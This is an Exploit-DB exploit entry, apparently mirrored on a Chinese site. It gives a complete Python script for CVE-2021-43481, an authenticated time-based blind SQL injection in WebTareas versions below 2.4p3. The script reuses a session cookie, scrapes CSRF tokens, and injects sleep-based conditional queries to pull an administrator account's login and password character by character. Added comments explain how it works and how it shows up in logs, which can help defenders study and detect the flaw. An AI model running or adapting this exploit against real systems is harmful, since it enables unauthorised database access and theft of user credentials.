WebTareas 2.4 – Blind SQLi (Authenticated)

  • 作者: Behrad Taher
    日期: 2022-05-11
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/50893/
  • # Exploit Title: WebTareas 2.4 - Blind SQLi (Authenticated)
    # Date: 04/20/2022
    # Exploit Author: Behrad Taher
    # Vendor Homepage: https://sourceforge.net/projects/webtareas/
    # Version: < 2.4p3
    # CVE : CVE-2021-43481
    
    #The script takes 3 arguments: IP, user ID, session ID
    #Example usage: python3 webtareas_sqli.py 127.0.0.1 1 4au5376dddr2n2tnqedqara89i
    
    import requests, time, sys
    from bs4 import BeautifulSoup
    # Positional arguments (see the usage comment in the header): target host,
    # the user ID that is only echoed in the status line, and the value of an
    # already-authenticated webTareasSID session cookie. No argument count
    # check is done here, so fewer than three arguments raise IndexError.
    ip = sys.argv[1]
    id = sys.argv[2]  # shadows the builtin `id`; read only by sqli()'s print
    sid = sys.argv[3]
    
    def sqli(column: str) -> None:
        """Recover one column of the gW8members row with id=1, one character at a time.

        Time-based blind oracle: for every position 1..32 and every printable
        byte 32..126, a crafted value is sent in the ``uq`` POST field of
        ``/approvals/editapprovaltemplate.php`` and a response that takes longer
        than 5 s is read as a match. Each guess costs one GET (to fetch the
        csrfToken) plus one POST, so a full column produces up to 32*95 GET/POST
        pairs against that single endpoint -- a highly repetitive, slow-response
        pattern that is visible in web-server and database logs (the payload
        carries a literal ``sleep(5)``). The header marks versions below 2.4p3
        as affected. Prints progress to stdout; returns nothing.
        """
        # NOTE: the ID argument only appears in this status line; the injected
        # subquery below targets the row with id=1 regardless of its value.
        print("Extracting %s from user with ID: %s\n" % (column,id))
        extract = ""
        for i in range (1,33):
            # Stop once a position yields no match: the previous position was the
            # last character of a value shorter than 32 bytes.
            if(len(extract) < i-1):
                break
            for j in range(32,127):
                # The candidate byte is compared via ascii(substring(...)); on a
                # match the database stalls for 5 seconds, otherwise it returns 0.
                injection = "SELECT 1 and IF(ascii(substring((SELECT %s FROM gW8members WHERE id=1),%d,1))=%d,sleep(5),0);" % (column,i,j)
                url = "http://%s/approvals/editapprovaltemplate.php?id=1" % ip
                GET_cookies = {"webTareasSID": "%s" % sid}
                r = requests.get(url, cookies=GET_cookies)
                # The application enforces CSRF tokens, so every POST is preceded
                # by a GET whose HTML is parsed for the current csrfToken value.
                # Raises TypeError if the input is absent (e.g. the session is
                # not valid, since the page is then not rendered).
                token = BeautifulSoup(r.text,features="html.parser").find('input', {'name':'csrfToken'})['value']
                # Authenticated issue: the same session cookie is sent with the POST.
                POST_cookies = {"webTareasSID": "%s" % sid}
                POST_data = {"csrfToken": "%s" % token, "action": "update", "cd": "Q", "uq": "%s" % injection}
                # Wall-clock round-trip time is the oracle; network latency is
                # not compensated for, so a slow link can produce false matches.
                start = time.time()
                requests.post(url, cookies=POST_cookies, data=POST_data)
                end = time.time() - start
                if end > 5:
                    extract += chr(j)
                    # Two cursor-up escapes so the growing value overwrites the
                    # previous progress line instead of scrolling.
                    print ("\033[A\033[A")
                    print(extract)
                    break
    # Entry point: the same routine is run for the login and password columns;
    # no __main__ guard, so importing this module also performs the requests.
    sqli("login")
    sqli("password")